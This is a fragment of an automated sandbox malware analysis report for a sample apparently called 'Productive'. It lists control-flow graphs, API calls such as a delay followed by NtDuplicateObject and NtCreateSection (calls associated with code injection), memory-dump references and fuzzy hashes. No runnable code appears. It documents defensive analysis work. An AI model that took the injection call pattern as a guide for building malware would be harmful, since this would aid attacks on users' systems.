                                                                                                                                                                • Instruction ID: 174e170e340bf8a179975233376f30ddfddc350f6889a811abbdb56ac23ca5b2
                                                                                                                                                                • Opcode Fuzzy Hash: 8129929dcf0bbd79af24a81b2c38932e9291217006394cc6761161a9486ba0b2
                                                                                                                                                                • Instruction Fuzzy Hash: CA5107B5900249BFEB209F91CC48FAFBFB9EF85B00F104159FA11BA2A5D6709945CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 439 401a2b 440 401a31-401a51 439->440 441 401a42-401a44 439->441 442 401a45-401a76 call 40126c 440->442 441->442
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019FF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                • Opcode ID: 4c41c8bab1c6a1f0947dd5257a85aa782199f9190ef104973f03e37446b74561
                                                                                                                                                                • Instruction ID: 0dc09ec7a8212673c0b64c59b3b69905f480851cd2b2cc5a140c83029e6ce7e0
                                                                                                                                                                • Opcode Fuzzy Hash: 4c41c8bab1c6a1f0947dd5257a85aa782199f9190ef104973f03e37446b74561
                                                                                                                                                                • Instruction Fuzzy Hash: E701C07230E201FBDB00AA909C42BAA3725AB45714F30407BF643780F1D63D8613EB2B

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 411 4019c0-401a14 call 40126c Sleep call 4014dc 424 401a23-401a76 call 40126c 411->424 425 401a16-401a1e call 4015dd 411->425 425->424
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019FF
                                                                                                                                                                  • Part of subcall function 004015DD: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                  • Part of subcall function 004015DD: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                                                • Opcode ID: ee3b4ff9f28762245370d646dbb0d87b3dd649d8477f3232f13b1743a4cbfe9a
                                                                                                                                                                • Instruction ID: 0e606c36985ec7e010fbc723f2126edf26d280ef646474503efdb025aaeb5722
                                                                                                                                                                • Opcode Fuzzy Hash: ee3b4ff9f28762245370d646dbb0d87b3dd649d8477f3232f13b1743a4cbfe9a
                                                                                                                                                                • Instruction Fuzzy Hash: A8016D7630D204FBDB00AA919C92AAA3225AB05710F30407BF613B80F1963D9513AB2B

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 451 4019cc-401a14 call 40126c Sleep call 4014dc 463 401a23-401a76 call 40126c 451->463 464 401a16-401a1e call 4015dd 451->464 464->463
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019FF
                                                                                                                                                                  • Part of subcall function 004015DD: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                  • Part of subcall function 004015DD: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                                                • Opcode ID: 196d3446046e920449c1709eedac07ce501592ae70f9aeb82e7ddf45a7f903fb
                                                                                                                                                                • Instruction ID: 4083db4e52ce123b8949ce0424939c41ed5d1ec6ad9c42056c6af69cfe96c3fa
                                                                                                                                                                • Opcode Fuzzy Hash: 196d3446046e920449c1709eedac07ce501592ae70f9aeb82e7ddf45a7f903fb
                                                                                                                                                                • Instruction Fuzzy Hash: 25015E7634D204FBDB00AA919C92FAA3225AB45710F30447BF613B80F1D67D9613AB6B

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 478 4019d4-401a14 call 40126c Sleep call 4014dc 488 401a23-401a76 call 40126c 478->488 489 401a16-401a1e call 4015dd 478->489 489->488
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019FF
                                                                                                                                                                  • Part of subcall function 004015DD: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                  • Part of subcall function 004015DD: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                                                • Opcode ID: 58e83137a199abdd3dffd74a1eb9042a4639c3b6abc5489d9539075b77c162b8
                                                                                                                                                                • Instruction ID: 904d0ebb16d1aa9f542c85ae0ff8302fc532ead39fbcbbfb1346e915e8ca0f34
                                                                                                                                                                • Opcode Fuzzy Hash: 58e83137a199abdd3dffd74a1eb9042a4639c3b6abc5489d9539075b77c162b8
                                                                                                                                                                • Instruction Fuzzy Hash: 5B01717630D104FBDB00AA919C92F6A3225AB05710F304477F613B80F1D63D9513AB2B

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 503 4019da-401a14 call 40126c Sleep call 4014dc 512 401a23-401a76 call 40126c 503->512 513 401a16-401a1e call 4015dd 503->513 513->512
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019FF
                                                                                                                                                                  • Part of subcall function 004015DD: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                  • Part of subcall function 004015DD: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                                                • Opcode ID: 45c53c12eb347d75b294d606ddea1a7dbc4dae308ce8f1eacd3f65d0f05d7011
                                                                                                                                                                • Instruction ID: f96ff76ce9e8ae0e8a200589e21a46627e12e0d1a4970a225ace3dce3066a092
                                                                                                                                                                • Opcode Fuzzy Hash: 45c53c12eb347d75b294d606ddea1a7dbc4dae308ce8f1eacd3f65d0f05d7011
                                                                                                                                                                • Instruction Fuzzy Hash: 59014F76309104FBDB00AAD59D92B6A3225AB45710F308477F613B80F1D63D9A13AB6B
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019FF
                                                                                                                                                                  • Part of subcall function 004015DD: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                  • Part of subcall function 004015DD: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                                                • Opcode ID: df462bd3be6ff8aba0280bf802fc79c7d33328997b5bf6fef240344bbc497842
                                                                                                                                                                • Instruction ID: 0a3676a865dd2aa01c7dcb14612a921535e7f4f026ef74b9be481ab94ea48cac
                                                                                                                                                                • Opcode Fuzzy Hash: df462bd3be6ff8aba0280bf802fc79c7d33328997b5bf6fef240344bbc497842
                                                                                                                                                                • Instruction Fuzzy Hash: E5018436309204FBDB00ABE49C41A6A33259F45310F204477F643B90F1D63D9522AB2B
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019FF
                                                                                                                                                                  • Part of subcall function 004015DD: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016A0
                                                                                                                                                                  • Part of subcall function 004015DD: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.20019248550.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                                                • Opcode ID: cf9b74e9b11a3474d2e291b9515fe0fa29bf7fc575aba9f4e9d4f8c3c3adac68
                                                                                                                                                                • Instruction ID: 5855330236b95dab03c5582b9724c2921129c4c430b695c807f16fa7b2138d37
                                                                                                                                                                • Opcode Fuzzy Hash: cf9b74e9b11a3474d2e291b9515fe0fa29bf7fc575aba9f4e9d4f8c3c3adac68
                                                                                                                                                                • Instruction Fuzzy Hash: DBF08136309204FBDF00AAE49C81EAA33259B44710F204577F653B80F1D63D9A23AF6B